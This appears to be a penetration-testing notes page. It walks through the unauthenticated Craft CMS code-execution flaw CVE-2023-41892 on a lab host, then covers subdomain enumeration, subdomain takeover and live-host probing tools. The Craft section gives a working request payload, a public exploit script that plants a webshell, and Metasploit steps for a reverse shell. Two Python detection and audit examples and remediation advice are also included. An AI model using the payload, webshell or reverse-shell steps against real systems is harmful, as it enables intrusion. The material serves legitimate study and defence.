[Exploitation] (CVE-2023-41892) Craft CMS code execution (Unauthenticated)

Craft CMS could allow a remote, unauthenticated attacker to execute arbitrary code on the system, caused by unsafe object instantiation in Craft installations. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.

The vulnerability is an unsafe PHP object instantiation in the `\craft\controllers\ConditionsController` class: attacker-controlled configuration is passed to the object factory, and instantiating `\GuzzleHttp\Psr7\FnStream` with attacker-chosen callbacks escalates the object creation into execution of arbitrary PHP code.

Combining this with the Imagick extension and MSL (Magick Scripting Language), a full RCE can be achieved. MSL is a built-in ImageMagick language for reading images, running image processing tasks, and writing the results back to the filesystem.

This can be leveraged to have the Imagick constructor create a dummy image containing malicious PHP code, delivering a webshell that the attacker can then access, thereby executing the malicious PHP code and gaining access to the system.

Affected Products

  • Craft CMS 4.4.14
  • Affected versions: >= 4.0.0-RC1, <= 4.4.14

Identification

Wappalyzer

Source Code

  • curl http://website.com

  • curl http://website.com -i

HTTP headers (Proxy)

Manual (Proxy)

1. Capture an HTTP request to the site in a proxy and replace its parameters with the payload below. Make sure the HTTP method is correct

  • action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()":[{"close":null}],"_fn_close":"phpinfo"}}

2. The response should contain the phpinfo() output, which confirms the target is vulnerable
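As an added detection example (not from the page's exploit script or from Craft CMS itself), the Python below inspects a decoded request body, as a WAF or reverse proxy with body logging would record it, for the indicators of the payload above: the conditions/render action together with a config JSON that instantiates a class outside the craft\ namespace or carries Yii-style `as `/`on ` attachment keys and `__construct()` calls. The sample bodies are constructed, and the trusted-namespace prefix is an assumption to tune per deployment.

```python
import json
from urllib.parse import parse_qs

# Constructed sample bodies. The first has the shape of the payload shown above
# (FnStream with a callback property); the second is a harmless conditions/render call.
MALICIOUS_BODY = (
    "action=conditions/render"
    "&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition"
    '&config={"name":"test[userCondition]","as xyz":{"class":"\\\\GuzzleHttp\\\\Psr7\\\\FnStream",'
    '"__construct()":[{"close":null}],"_fn_close":"phpinfo"}}'
)
BENIGN_BODY = (
    'action=conditions/render&config={"name":"test[entryCondition]",'
    '"class":"craft\\\\elements\\\\conditions\\\\entries\\\\EntryCondition"}'
)

TRUSTED_CLASS_PREFIX = "craft\\"  # assumption: condition classes legitimately live under craft\


def _walk(node, findings, path):
    """Recursively flag object-instantiation constructs inside the decoded config JSON."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "class" and isinstance(value, str):
                cls = value.lstrip("\\")
                if not cls.startswith(TRUSTED_CLASS_PREFIX):
                    findings.append(f"{path}: instantiates non-Craft class {cls}")
            elif key.endswith("()"):
                # Yii-style "method()" keys are invoked while the object is being configured
                findings.append(f"{path}: method-call key {key}")
            elif key.startswith(("as ", "on ")):
                # Yii-style behavior / event-handler attachment, used to nest a new object
                findings.append(f"{path}: behavior/event key {key!r}")
            _walk(value, findings, f"{path}.{key}")
    elif isinstance(node, list):
        for i, item in enumerate(node):
            _walk(item, findings, f"{path}[{i}]")


def inspect_request(body):
    """Return findings for one form-encoded request body; an empty list means nothing matched."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action", [""])[0] != "conditions/render":
        return []
    findings = []
    for raw in params.get("config", []):
        try:
            cfg = json.loads(raw)
        except json.JSONDecodeError:
            findings.append("config: not valid JSON")
            continue
        _walk(cfg, findings, "config")
    return findings
```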

Exploitation (Script)

1. This vulnerability can be exploited with a script (https://github.com/Faelian/CraftCMS_CVE-2023-41892); download it using git

  • git clone https://github.com/Faelian/CraftCMS_CVE-2023-41892.git

2. Run craft-cms.py (sometimes you need to modify the script so the webshell is uploaded to a folder the web server can write to)

  • python3 craft-cms.py http://surveillance.htb

3. You can also run commands from shell.php (http://surveillance.htb/shell.php?cmd=whoami)

Important: remember to delete this file after your assessment. Since you can already execute commands at this point, you can also upload a different webshell from there.

Exploitation (Metasploit)

1. The Metasploit module craftcms_unauth_rce_cve_2023_41892 exploits this vulnerability and returns a reverse shell

  • use exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
  • show options

2. Set the options

  • set RHOSTS surveillance.htb
  • set LHOST tun0

3. (OPTIONAL) Modify the port and SSL, in my case the website was using port 80, without SSL

  • set RPORT 80
  • set SSL false

4. (OPTIONAL) Set the PHP function used to run the payload

  • set command system

5. Run the exploit

  • run

Remedy

Upgrade to the latest version of Craft CMS (3.8.15, 4.4.15 or later)

Besides applying the patch, rotate the CRAFT_SECURITY_KEY immediately: knowledge of the key leads to an unauthenticated RCE on a widely used Craft CMS plugin, and there may be more.

Reference

https://www.cve.org/CVERecord?id=CVE-2023-41892

https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g

https://github.com/craftcms/cms/commit/7359d18d46389ffac86c2af1e0cd59e37c298857

https://github.com/craftcms/cms/commit/a270b928f3d34ad3bd953b81c304424edd57355e

https://github.com/craftcms/cms/commit/c0a37e15cc925c473e60e27fe64054993b867ac1

https://github.com/craftcms/cms/commit/c0a37e15cc925c473e60e27fe64054993b867ac1#diff-47dd43d86f85161944dfcce2e41d31955c4184672d9bd9d82b948c6b01b86476

https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4415---2023-07-03-critical

https://packetstormsecurity.com/files/176303/Craft-CMS-4.4.14-Remote-Code-Execution.html

https://www.rapid7.com/db/modules/exploit/linux/http/craftcms_unauth_rce_cve_2023_41892/

https://gist.github.com/to016/b796ca3275fa11b5ab9594b1522f7226

[Active – Information Gathering] Finding Sub-Domains with AssetFinder

Find domains and subdomains potentially related to a given domain.

Installation

1. Go needs to be installed; alternatively you can use the pimpmykali script (https://github.com/Dewalt-arch/pimpmykali)

  • Choose: 3 - Fix Golang

2. Once Go is installed, install the tool

  • apt install assetfinder

3. Display the help menu

  • assetfinder --help

How to use

1. Pass a domain to find all entries related to it. This option usually displays a lot of unrelated records

  • assetfinder tesla.com
  • assetfinder <Domain>

2. For more accurate results use the --subs-only flag, which returns only subdomains of the given domain

  • assetfinder --subs-only tesla.com

[Active – Information Gathering] Finding Sub-Domains with Amass

The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.

Amass comes preinstalled in the latest Kali Linux; if you need to install it, follow the official guide

https://github.com/owasp-amass/amass/blob/master/doc/install.md

https://github.com/owasp-amass/amass/blob/master/doc/user_guide.md

How to use

1. Display help menu

  • amass -h

2. Enumerate subdomains

  • amass enum -d tesla.com

Amass Intel

1. amass intel gathers basic information about the target from various other tools and sources: it finds IPv4 and IPv6 addresses and basic WHOIS information.

  • amass intel -d owasp.org -whois

2. Amass can also search by organization name. This search can yield the ASN IDs that have been assigned to the target.

  • amass intel -org 'google'

The ASN numbers are now known, so the ASN can be used as the seed instead of a domain name. The -active flag makes amass perform active reconnaissance against the discovered address ranges (contacting the hosts directly, for example to pull names from their TLS certificates) rather than relying on passive sources only, and -ip prints the IP addresses found.

  • amass intel -active -asn 44384 -ip

Amass Enum

1. The enum subcommand enumerates subdomains through DNS and maps the surrounding network. With -passive only passive data sources are queried (no direct contact with the target), and -src prints the source that reported each name.

  • amass enum -passive -d google.com -src

2. Subdomain names can also be brute-forced against the target with a wordlist (-brute -w). For educational purposes only.

  • amass enum -active -d google.com -brute -w /usr/share/wordlists/amass/all.txt

Sources

https://techyrick.com/amass-full-tutorial/

https://github.com/owasp-amass/amass/blob/master/doc/tutorial.md

[Active – Information Gathering] Subdomain take over

Subjack is a Subdomain Takeover tool written in Go designed to scan a list of subdomains concurrently and identify ones that are able to be hijacked. With Go's speed and efficiency, this tool really stands out when it comes to mass-testing. Always double check the results manually to rule out false positives.

Subjack will also check for subdomains attached to domains that don't exist (NXDOMAIN) and are available to be registered. No need for dig ever again! This is still cross-compatible too.

Subdomain takeover vulnerabilities occur when a subdomain (subdomain.example.com) is pointing to a service (e.g. GitHub pages, Heroku, etc.) that has been removed or deleted. This allows an attacker to set up a page on the service that was being used and point their page to that subdomain. For example, if subdomain.example.com was pointing to a GitHub page and the user decided to delete their GitHub page, an attacker can now create a GitHub page, add a CNAME file containing subdomain.example.com, and claim subdomain.example.com.

https://github.com/haccer/subjack

There are several tools with dictionaries to check for possible takeovers:

Subdomain Takeover Generation via DNS Wildcard

When a DNS wildcard is used in a domain, any requested subdomain of that domain that does not have its own explicit record resolves to the same data. This could be an A record (IP address), a CNAME, and so on.

  • For example, if *.testing.com is wildcarded to 1.1.1.1, then non-existent.testing.com will point to 1.1.1.1.

However, if instead of an IP address the sysadmin points the wildcard to a third-party service via CNAME, for example a GitHub Pages subdomain (sohomdatta1.github.io), an attacker can create their own page on that third-party service (GitHub in this case) and declare that something.testing.com points there. Because the wildcard CNAME resolves any name, the attacker can generate arbitrary subdomains of the victim's domain that point to their pages.

Exploiting a subdomain takeover

Subdomain takeover is essentially DNS spoofing for a specific domain across the internet, allowing attackers to set A records for a domain, leading browsers to display content from the attacker's server. This transparency in browsers makes domains prone to phishing. Attackers may employ typosquatting or Doppelganger domains for this purpose. Especially vulnerable are domains where the URL in a phishing email appears legitimate, deceiving users and evading spam filters due to the domain's inherent trust.

SSL Certificates

SSL certificates, if generated by attackers via services like Let's Encrypt, add to the legitimacy of these fake domains, making phishing attacks more convincing.

Cookie Security and Browser Transparency

Browser transparency also extends to cookie security, governed by policies like the Same-origin policy. Cookies, often used to manage sessions and store login tokens, can be exploited through subdomain takeover. Attackers can gather session cookies simply by directing users to a compromised subdomain, endangering user data and privacy.

Emails and Subdomain Takeover

Another aspect of subdomain takeover involves email services. Attackers can manipulate MX records to receive or send emails from a legitimate subdomain, enhancing the efficacy of phishing attacks.

Higher Order Risks

Further risks include NS record takeover. If an attacker gains control over one NS record of a domain, they can potentially direct a portion of traffic to a server under their control. This risk is amplified if the attacker sets a high TTL (Time to Live) for DNS records, prolonging the duration of the attack.

Installation

1. Install subjack

  • go install github.com/haccer/subjack@latest

2. Display help menu

  • subjack -h

How to use

1. Find the fingerprints.json file

  • find -type f -name "fingerprints.json"

2. Run this tool against a subdomain list

  • subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl -c ./go/pkg/mod/github.com/haccer/subjack@v0.0.0-20201112041112-49c51e57deab/fingerprints.json -v 3

3. Save the output to a file

  • subjack -w ./Desktop/URL-list.txt -t 100 -timeout 30 -ssl -c ./go/pkg/mod/github.com/haccer/subjack@v0.0.0-20201112041112-49c51e57deab/fingerprints.json -v 3 -o results.txt

4. Scan a single domain or subdomain

  • subjack -d dev.tesla.com -t 100 -timeout 30 -o results.txt -ssl -c ./go/pkg/mod/github.com/haccer/subjack@v0.0.0-20201112041112-49c51e57deab/fingerprints.json -v 3

Options

  • -d test.com if you want to test a single domain.
  • -w domains.txt is your list of subdomains.
  • -t is the number of threads (Default: 10 threads).
  • -timeout is the seconds to wait before timeout connection (Default: 10 seconds).
  • -o results.txt where to save results to. For JSON: -o results.json
  • -ssl enforces HTTPS requests which may return a different set of results and increase accuracy.
  • -a skips CNAME check and sends requests to every URL. (Recommended)
  • -m flags a dead record that still has a valid CNAME entry.
  • -v verbose. Display more information per each request.
  • -c Path to configuration file.

Mitigation

  • Removing vulnerable DNS records - This is effective if the subdomain is no longer required.
  • Claiming the domain name - Registering the resource with the respective cloud provider or repurchasing an expired domain.
  • Regular monitoring for vulnerabilities - Tools like aquatone can help identify susceptible domains. Organizations should also revise their infrastructure management processes, ensuring that DNS record creation is the final step in resource creation and the first step in resource destruction.
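As an added example (not part of subjack or of the sources listed below), the Python below implements the monitoring step for the two cases described in this section: CNAMEs whose target no longer exists (NXDOMAIN) and wildcard CNAMEs that point at a third-party service. The zone export, the resolver answers and the list of takeover-prone service suffixes are constructed assumptions; the simulated resolve() keeps it runnable offline.

```python
# Added example, not part of subjack: audit a zone's CNAME records for takeover exposure.
# DNS resolution is simulated with a constructed lookup table so the script runs offline;
# swap resolve() for a real resolver (e.g. dnspython) to audit a live zone.

# Host suffixes of third-party services where an unclaimed target name can be registered
# by anyone (assumed, illustrative list; extend it from a fingerprint list such as subjack's).
TAKEOVER_PRONE_SUFFIXES = (".github.io", ".herokuapp.com")

# Constructed zone export: record name -> (type, data)
ZONE = {
    "blog.example.com": ("CNAME", "old-team.github.io"),          # project deleted, target gone
    "app.example.com": ("CNAME", "live-app.herokuapp.com"),       # still claimed and resolving
    "*.testing.example.com": ("CNAME", "sohomdatta1.github.io"),  # wildcard to a third party
    "www.example.com": ("A", "203.0.113.10"),                     # plain A record, not checked
}

# Constructed resolver answers for the CNAME targets (None stands for NXDOMAIN).
RESOLVER_ANSWERS = {
    "old-team.github.io": None,
    "live-app.herokuapp.com": "203.0.113.20",
    "sohomdatta1.github.io": "203.0.113.30",
}


def resolve(name):
    """Simulated lookup: returns an address, or None when the name does not exist."""
    return RESOLVER_ANSWERS.get(name)


def audit_zone(zone, resolve_fn=resolve):
    """Return (severity, record, reason) for every CNAME that exposes a takeover path."""
    findings = []
    for name, (rtype, target) in zone.items():
        if rtype != "CNAME":
            continue
        third_party = target.endswith(TAKEOVER_PRONE_SUFFIXES)
        if resolve_fn(target) is None:
            # Dangling CNAME: the target is NXDOMAIN; on a third-party service anyone may claim it.
            severity = "HIGH" if third_party else "MEDIUM"
            findings.append((severity, name, f"dangling CNAME -> {target} (NXDOMAIN)"))
        elif name.startswith("*.") and third_party:
            # Wildcard CNAME to a third party: every name under the wildcard can be bound to an
            # attacker-created page on that service, even though the target resolves today.
            findings.append(("MEDIUM", name, f"wildcard CNAME -> {target} on a third-party service"))
    return findings


if __name__ == "__main__":
    for severity, record, reason in audit_zone(ZONE):
        print(f"[{severity}] {record}: {reason}")
```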

Sources

https://www.hackerone.com/application-security/guide-subdomain-takeovers

https://book.hacktricks.xyz/pentesting-web/domain-subdomain-takeover

https://github.com/EdOverflow/can-i-take-over-xyz

https://developer.mozilla.org/en-US/docs/Web/Security/Subdomain_takeovers

[Active – Information Gathering] Check alive URLs from a list using httprobe

Take a list of domains and probe for working http and https servers.

https://github.com/tomnomnom/httprobe

Installation

1. Download the tool

  • go install github.com/tomnomnom/httprobe@latest

2. Get help menu

  • httprobe -h

How to use

1. Run the tool against a file (HTTP & HTTPS)

  • cat URL-list.txt | httprobe

2. Check against HTTPS only

  • cat URL-list.txt | httprobe -s -p https:443

3. To keep only the host names (strip the scheme and the :443 suffix; a plain `tr -d ":443"` would instead delete every ':', '4' and '3' character, mangling host names that contain those digits)

  • cat URL-list.txt | httprobe | sed -E 's#^https?://##; s#:443$##'